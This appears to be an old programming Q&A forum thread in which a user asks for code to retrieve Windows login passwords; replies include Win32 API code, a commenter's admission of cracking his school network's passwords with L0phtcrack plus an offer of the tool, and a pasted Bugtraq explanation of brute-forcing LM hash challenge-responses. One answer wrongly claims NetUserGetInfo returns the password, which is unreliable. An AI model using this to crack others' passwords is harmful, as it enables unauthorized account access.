[Webinar] Streamline your web hosting managementRegister Today

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 695
  • Last Modified:

getting user name password

hi

i have write a program  that gives login name and password of windows. can any one send code to that.please....
0
sureshkumar
Asked:
sureshkumar
  • 7
  • 7
  • 4
  • +3
1 Solution
 
abdijCommented:
You can get the login name of the user by using the API

BOOL GetUserName( LPTSTR lpBuffer,
 // address of name buffer
 
LPDWORD nSize
 // address of size of name buffer
 
);
 
But the password cannot be got. (Just imagine what havoc it can cause if a hacker sends a Trojan horse application ???

But i think this does not satisfy your requiremnts.

fell free to ask
my mail id is abdij_b@hotmail.com
0
 
SileNcerCommented:
You can also get the computer name in much the same way with the function:

BOOL GetComputerName(
  LPTSTR lpBuffer,  // address of name buffer
  LPDWORD nSize     // address of size of name buffer
);
0
 
sureshkumarAuthor Commented:
Adjusted points to 50
0
The new generation of project management tools

With monday.com’s project management tool, you can see what everyone on your team is working in a single glance. Its intuitive dashboards are customizable, so you can create systems that work for you.

 
abdijCommented:
Sorry, you can change the password.

Hope this code is what you need:

I am having a dialog based application where i have two edit boxes to get the Login name and password.
The Login name is used to compare with the computer User name who has logged (Just a demo). The password is the new password to set.

//**********************      Important      ***************************************
// Be sure to include the headers in your code
// #include "Lmcons.h"
// #include "lmaccess.h"
// #include "lm.h"

// Link the library netapi32.lib in VC
// Project->Settings->Link->object/library Modules.
//**********************      Important      ***************************************


void CLogDlg::OnOK()
{
      BOOL                  bRes                        = FALSE;            // general operation flag
      BOOL                  bDone                        = FALSE;            // loop terminator
      DWORD                  dwNameSize                  = 0;                  // size of User Name
      DWORD                  dwPasswdSize            = 0;                  // Size of Password
      DWORD                  dwComputerNameSize      = 0;                  // Size of Computer Name
      DWORD                  dwError                        = 0;                  // Error Code
      DWORD                  dwLevel                        = 0;                  // the Net User Level
      LPTSTR                   lpszLoginName            = 0;                  // string pointer to User Name
      LPWSTR                  lpwszLoginName            = 0;                  // Unicode user name
      LPTSTR                   lpszComputerName      = 0;                  // string pointer to computer name
      LPWSTR                  lpwszComputerName      = 0;                  // Unicode computer name
      LPTSTR                   lpszPasswd                  = 0;                  // string pointer to password
      LPWSTR                  lpwszPasswd                  = 0;                  // Unicode password
      char                  szErrorMsg[1000];                              // error message holder
      USER_INFO_3            UserInfo;                                          // the User level 3 user info
      NET_API_STATUS      nStatus;                                          // the network status

      // allocate memory for all string pointers
      lpszLoginName            = new char[UNLEN + 1];
      lpwszLoginName            = new wchar_t[(UNLEN + 1)*2];
      lpszComputerName      = new char[MAX_COMPUTERNAME_LENGTH  + 1];
      lpwszComputerName      = new wchar_t[(MAX_COMPUTERNAME_LENGTH  + 1)*2];
      lpszPasswd                  = new char[PWLEN/2];
      lpwszPasswd                  = new wchar_t[PWLEN];

      // Get the User Name
      while(!bDone)
      {
            bRes = GetUserName(lpszLoginName,&dwNameSize);
            if(!bRes)
            {
                  dwError = GetLastError();

                  switch(dwError)
                  {
                  case ERROR_INSUFFICIENT_BUFFER:
                        {
                              // allocate necessay memory
                              wsprintf(szErrorMsg,"The Buffer passed is insufficient");
                              delete lpszLoginName;
                              lpszLoginName = new char[dwNameSize];
                        } // end of case

                        //AfxMessageBox(szErrorMsg);
                  } // end of switch      
            } // end of if
            else
                  bDone = TRUE;
      } // end of while

      // reset flag
      bDone      = FALSE;

      // get the computer name
      while(!bDone)
      {
            bRes = GetComputerName(lpszComputerName,&dwComputerNameSize);
            if(!bRes)
            {
                  dwError = GetLastError();

                  switch(dwError)
                  {
                  case ERROR_INSUFFICIENT_BUFFER:
                        {
                              // allocate more memory
                              wsprintf(szErrorMsg,"The Buffer passed is insufficient");
                              delete lpszComputerName;
                              lpszComputerName = new char[dwComputerNameSize];
                        } // end of case

                        //AfxMessageBox(szErrorMsg);
                  } // end of switch      
            } // end of if
            else
                  bDone = TRUE;
      } // end of while

      // convert to unicode
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszLoginName, (int)dwNameSize, lpwszLoginName, (int)((UNLEN + 1)*2));
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszComputerName, (int)dwComputerNameSize, lpwszComputerName, (int)((MAX_COMPUTERNAME_LENGTH + 1)*2));
      MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, lpszPasswd, (int)dwPasswdSize, lpwszPasswd, (int)(PWLEN-10));

      // get data from dialog
      UpdateData(TRUE);

      // copy password to set
      strcpy(lpszPasswd,m_szLoginPassword);
      dwPasswdSize = (DWORD)strlen(lpszPasswd);

      // check if Application user is legal computer access holder
      if(strcmpi(lpszLoginName, m_szLoginName) == 0)
      {
            // set the user level
            dwLevel = 3;
            // form the user3 structure and set the password
            UserInfo.usri3_password = lpwszPasswd;
            // set the password
            nStatus = NetUserSetInfo(NULL/*lpwszComputerName*/, (LPCWSTR)lpwszLoginName, dwLevel, (LPBYTE)&UserInfo, &dwError);
            if(nStatus == NERR_Success)
            {
                  AfxMessageBox("Done");
            }
            else
            {
                  AfxMessageBox("Not done");
            }
      } // end of if
      else
            AfxMessageBox("Invalid Account");

      // free resource we used
      delete [] lpszLoginName;
      delete [] lpwszLoginName;
      delete [] lpszPasswd;
      delete [] lpwszPasswd;
      delete [] lpszComputerName;
      delete [] lpwszComputerName;

      CDialog::OnOK();
}

Also if you know the old password you can use the

NET_API_STATUS NetUserChangePassword(
  LPCWSTR domainname,  
  LPCWSTR username,    
  LPCWSTR oldpassword,
  LPCWSTR newpassword  
);
API.
Contact me if you need further info.
0
 
sureshkumarAuthor Commented:
No i want password.
0
 
abdijCommented:
Use the
NET_API_STATUS NetUserGetInfo(
  LPCWSTR servername,  
  LPCWSTR username,    
  DWORD level,        
  LPBYTE *bufptr      
);

Function similar to how i have used.
Modify my program in that area as i mention below to get the password.

Set the
1. servername to NULL.
2. username lpwszLoginName
3. level to dwLevel
4. bufptr to (LPBYTE)&UserInfo

Note there is no 5th parameter.

The UserInfo.usri3_password is a LPWSTR that has the password.

Hope this ok with you.

Feel free if you want me to modify my code. My mail id is abdij_b@hotmail.com
Thanx
0
 
sureshkumarAuthor Commented:
sorry, I am not getting password. But thank you for your efforts.keep it up.


suresh kumar
0
 
gysbert1Commented:
In any operating system that has ANY claim to having security it is impossible to get the password, only possible to compare a password with the one the user entered. On most operating systems the system admin can not even give you your password but can only reset it to a standard, selected or blank one.

If you are able to get the password you have found a very serious security hole in windows and we better notify Microsoft so they can try and fix it (service pack 8,9 or maybe 10 if it is too difficult ...) but then again Microsoft has never been known to have security so it might be possible.
0
 
abdijCommented:
Hi,
 Thats what i have been precisely trying to tell from a long long time.
But gysbert1 i just hope my friend Suresh is not interested in Hacking. Ofcourse there are Password crackers available that hack the password (including NT). But programatically i still guess the answer would be no.

Any way all the best.
Bye
Abdij
0
 
gysbert1Commented:
abdij,

I think that is precisely what he is trying to do!

Considering the facts I would say he owes you the points as you have given him the correct answer in your first comment ...
0
 
abdijCommented:
Hi,
  No COmments!!!!!!!!!!!
Bye.
Abdij
0
 
SileNcerCommented:
Oh, but there is a way to get the password.. at least in windowsNT =]  I know because I almost got caught doing it on my highschool network.  Cracked about 40% of the passwords... could have got all of them if I had enough time.
There is a program called IOphtcrack and that is what i used.  Don't ask me how it works, but if any user can get admin access, this program will recover the password dumps and figure out all the passwords extremely fast!
If you want this program i can give you a copy: email me at morrisra@muohio.edu  I'm not sure if there is a source code for it available, but you might want to look into it.
0
 
SileNcerCommented:
Another tid-bit of info for you:

The most recent security breach, a hacker-borne crack called IOphtcrack V1.5, may point to some security weaknesses not only inherent in Windows NT V4.0, but in Microsoft's upcoming Windows NT V5.0 as well. Although Microsoft is reportedly beefing up Windows NT V5.0's security with a Kerberos 5 and X.509 certificate model, it is also including the NT LAN Manager (NTLM) protocol support it has relied upon in all current versions of Windows NT. NTLM is an authentication protocol that ensures Windows NT compatibility with OS/2 LAN Manager, and will be retained in Windows NT V5.0 for backward compatiblity. Herein lies the rub.

Because NTLM's password structure breaks a password into two seven-character pieces and assigns null characters to unfilled character spaces when a password is under 14 characters, it is extremely easy to crack. IOphtcrack V1.5 is designed to sniff for passwords on a network and crack them by using a dictionary-based attack.
0
 
SileNcerCommented:
Ok, here is where you can get the newest version and source code! http://www.l0pht.com/l0phtcrack/

hope this helps you =]
0
 
SileNcerCommented:
Ok, here is where you can get the newest version and source code! http://www.l0pht.com/l0phtcrack/

hope this helps you =]
0
 
abdijCommented:
Hi,
 And i thought this place was ment for legitimate users and that my friend was a Programmer not a Hacker. GOD!!!!.

But Hackers are EXPERTS TOO!!!!!!!!!!
Bye
0
 
danelroismanCommented:
Use

NET_API_STATUS NetUserGetInfo(
  LPCWSTR servername,  
  LPCWSTR username,    
  DWORD level,        
  LPBYTE *bufptr      
);

with parametes for DWORD level - USER_INFO_1 .

look for more information on the web:

http://msdn.microsoft.com/library/psdk/network/ntlmapi2_8g6n.htm       


Daniel

0
 
SileNcerCommented:
yes, but the password is always returned NULL if you read it!  He wants the password.
0
 
abdijCommented:
Hi,
 dnaelroisman, Have you read all the comments before answering???????????????? I have already given this !!!!!

Bye
ABdij
0
 
sureshkumarAuthor Commented:
Hi all,

Thanks for your help.But i am saying once more i am not doing any hacking . And i dont like such type of nonsense things.Since I.T. is most useful we have to use properly.

Hi dane,
I am not getting password and i got same answer form abduji i rejected that answer.But thanks for your help keep it up.


suresh kumar

0
 
SileNcerCommented:
I snatched the following from the L0phtcrack site for anyone interested:

A L0phtCrack Technical Rant
Date: Thu, 24 Jul 1997 10:24:37 -0400
From: Who cares what the hell goes into a Gecos field anyway!

To: BUGTRAQ@NETSPACE.ORG
Subject: Windows NT rantings from the L0pht


I didn't ask to be cc'd into the rantings of the MS Borg Marketing Juggernaut but since I'm here... I find this hillarious. The people at MS should know better. I haven't been following this thread tremendously but I've seen bit's and pieces. Recently there was an attrocious article in WindowsNT magazine, where they stated it would take 5000 or so years to break the passwords; thus put policy in place to have users change their passwords every 2500 years. HELLO? I think these people aren't getting it. Let's shed some light on things shall we?

1. Thank you very little MS for dropping any reference to the l0pht, hobbit, or myself in reference to your recent LM-Hash fix. If this is how you "correspond" with people who point out problems to you it's no wonder that people prefer to release things to the public instead of your "proper" channels.

2. MS agrees that the LM hash is a horrible implementation from a security standpoint. They respond with: "well we didn't write the protocol that was IBM".

3. When MS had the chance to do things a different way (ie Network challenge/response obfuscation on NT boxes) they implemented it based upon LM techniques to break up components (see #2).

4. The LM-hash fix works great if you don't have anything but NT machines on your network. If you want to continue being "productive" with your win95 machines it is my understanding that you "do it insecurely" or you are S.O.L.5. Few places are running "nothing but NT" (ie just about everyone has 95 or WfW boxes if MS has already gotten their foot in the door).(see #4)

5. MS can't swallow their pride enough to say "oops", even in technical circles where they don't have to worry about the general public mis-interpreting things.

6. For the LM hash you only have to break 7 characters, not 14!

7. MS keeps talking about the NT hash being so secure while refusing to talk about how weak the LM hash is. Guess what, you probably won't be able to use the "added security" of the NT hash on your network. Why keep talking about something people can't use?

8. Even though the NT hash spec says you can have up to 128 charpasswords, I'd really like someone to show me how they can type more than 14 characters into UserManager before it starts Beep-Beep'ing at them.

9. We demonstrate up front with proof of concept code in L0phtcrack v1.0, and L0phtcrack v1.5 that the following is indeed the case. For those that don't know, L0phtcrack v1.5 will attack the challenge response done over the network. The reason we came out with this was that the SYSKEY "fix" that MS came out with only managed to emasculate the ADMINISTRATOR and not address the actuall problem. Can we say "save face"? I knew we could. L0phtcrack v1.5 is available for FREE from http://www.L0pht.com (that's a ZERO after the 'L', not an 'o') . It comes with source so you can build it on just about any platform. It is proof-of concept code and thus could be sped up tremendously.

L0phtCrack 2.0 is sped up and includes the network sniffer.

Now, let's rip apart why it is so trivial to go through the LM hash on the network. And then talk about why the NT hash doesn't matter.

 --------------------------    -----------------------------
|     16byte LM hash       |  |   16byte NT hash (md4)      |
 --------------------------    -----------------------------

We already know that you only have to go through 7 characters to retrieve passwords (up to 14 chars in length) in the LM hash, and that since there is no salting being done, constants show up all over the place giving away too much information and speeding up attacks tremendously.
  -------------------------------------------------
 | 1st 8bytes of LMhash  | second 8bytes of LMhash |
  -------------------------------------------------

1st 8 bytes are derived from the first seven characters of the passwordand the second 8 bytes are derived from the 8th through 14th characters of the password. If the password is less than 7 characters then the second half will always be: 0xAAD3B435B51404EE.
Let's assume for this example that the users password has a LM hash of 0xC23413A8A1E7665fAAD3B435B51404EE (which I'll save everyone thenanosecond it would have taken for them to plug this into L0phtcrack and have it tell them the password is "WELCOME").

Here's what happens to this hash on the network:

  --------                  --------
 |   A    | <______________|  B     |
 |        |                |        |  
  --------                  --------

B sends an 8 byte challenge to A. (assume 0x0001020304050607) Machine A takes the hash of 0xC23413A8A1E7665fAAD3B435B51404EE and adds 5 nulls to it, thus becoming 0xC23413A8A1E7665fAAD3B435B51404EE0000000000.
The string 0xC23413A8A1E7665fAAD3B435B51404EE0000000000 is broken into three groups of 7:C23413A8A1E766 5fAAD3B435B514 04EE0000000000 The 7 byte strings are str_to_key'd (if you will) into 8 byte odd parity des keys.

Now we have :

| 8byteDeskey1 |      | 8byteDeskey2 |    | 8 byteDeskey3 |

8byteDeskey1 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xAAAAAAAAAAAAAAAA. 8byteDeskey2 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xBBBBBBBBBBBBBBBB. 8byteDeskey3 is used to encrypt the challenge 0x0001020304050607. Let's assume the result is 0xCCCCCCCCCCCCCCCC. The three 8byte values are concatenated (!dumb!), and the 24 byte response of 0xAAAAAAAABBBBBBBBCCCCCCCC is returned to the server. The server does the same thing to the hash on it's end and compares the result to the 24 byte response. If they match, it was the correct original hash.
Why this is boneheaded: 7 char or less passwords.

     --------------------  --------------------  --------------------
    |   C23413A8A1E766   ||  5fAAD3B435B514    ||   04EE0000000000   |
     --------------------  --------------------  --------------------

The first thing we check is to see if the users password is less than 8 characters in length. We do this by taking the 7 byte value of 0x04EE0000000000, turning it into an 8 byte odd parity DES key, and encrypting it against the 8 byte challenge of 0x0001020304050607. If we get the result of 0xCCCCCCCCCCCCCCCC then we are pretty sure it's < 8 chars in length. In order to be sure we can run through 0x??AAD3B435B514 (ie 256 possible combinations) to see that 5f shows us the result is 0xBBBBBBBBBBBBBBBB, proving that the password is less than 7 characters and also giving us the last byte of the first half of the LM hash.
From this point, even assuming we're just joyriding and not worried about optimizing the way this is done (believe me, there are much more effective ways to do this that reduce the amount of time needed even further... this whole this is just showing that even a simplistic attack works against this implementation), it's no different than how a tool like L0phtcrack attacks the hashes in the registry. 8 char or greater passwords.

     --------------------  --------------------  --------------------
    |   C23413A8A1E766   ||  AC435F2DD90417    ||   CCD60000000000   |
     --------------------  --------------------  --------------------

The first thing to check is whether the password is less than 8 characters in length. Deriving the 8 byte odd parity des key from 0x04EE0000000000 and encrypting against 0x0001020304050607 does not, in this case, give us 0xCCCCCCCCCCCCCCCC, so we know that the password is 8 characters orgreater.
It takes us, in a worst case scenario, 65535 checks to figure out that the 2bytes that are used in the last third are 0xCCD6. Even approaching this in a completely brain-dead fashion (hey, turn-about is fair play), you can go through your 7 digit combinations of characters for the first third the same way you would the LM hash from the registry. This will yield not only the first third of the response, but also the first byte of the second third. Keep in mind that you already have the last two bytes that made up the third third.

You could approach the middle third in the same fashion. (note: this whole method that MS is doing screams for a precompute table lookup attack - which given the small enough potential values is not impossible by any means)

Thus, the challenge response is completely brute-forcable for the LM-hash. MS made the "oversight" of still sending the LM-hash response along with the NT response even when SP3 was installed. Thus it was a moot point as to how tough or well done the NT hash might or might not be. Since installing the LM-fix precludes continued use of windows 95 machines in regards to talking to NT machines, it is still a moot point as to how tough or well done the NT hash might or might not be.

The LM hash is incredibly weak and your more secure NT hash is brought down to the lowest common denominator. Thus, the challenge response is completely brute-forcable for the LM-hash. MS made the "oversight" of still sending the LM-hash response along with the NT response even when SP3 was installed. Thus it was a moot point as to how tough or well done the NT hash might or might not be. Since installing the LM-fix precludes continued use of windows 95 machines in regards to talking to NT machines, it is still a moot point as to how tough or well done the NT hash might or might not be.

The LM hash is incredibly weak and your more secure NT hash is brought down to the lowest common denominator. It would have been nice if you could type a password greater than 14chars into the UserManager app.

..mudge
0
 
cyprus106Commented:
boy, just about everybody on this thread has told you that the password cannot be got!!! you can CRACK the password through a cracker, but you cannot simply issue some code and get the password. IT DOESNT WORK LIKE THAT! Microsoft uses a 40 byte encryption method to encrypt it's passwords. you can d\l a hacker for it like SileNcer said, but you simply can't just display the password. as much as you hate to admit it, your talking about hacking, (which is HOW you get the password, if your that desperate) otherwise you can't. get over it. quit wasting people's time begging, they've given you plenty of answers.

now if (in the off-chance) you DO get this password thing up and running...

SEND IT TO ME: (cyprushacker@hotmail.com) then you can laugh in my face and gloat about it and i'll tell you you were right if it makes you feel better)
0

Featured Post

The new generation of project management tools

With monday.com’s project management tool, you can see what everyone on your team is working in a single glance. Its intuitive dashboards are customizable, so you can create systems that work for you.

  • 7
  • 7
  • 4
  • +3
Tackle projects and never again get stuck behind a technical roadblock.
Join Now